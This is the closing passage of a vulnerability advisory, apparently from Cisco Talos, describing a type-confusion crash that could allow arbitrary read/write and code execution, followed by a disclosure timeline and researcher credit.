In the above debugger output, the crash occurs when esi is dereferenced as if it were an object pointer. Depending on the memory layout of the process, it may be possible to do arbitrary read and write access, which could ultimately be abused to achieve arbitrary code execution. Additionally, it should be noted that this vulenrability is very similar to a previously reported type confusion vulenrability that was tracked as CVE-2023-32664 and TALOS-2023-1795.

TIMELINE

2023-09-18 - Vendor Disclosure
2023-11-22 - Vendor Patch Release
2023-11-27 - Public Release

Credit

Discovered by Kamlapati Choubey of Cisco Talos.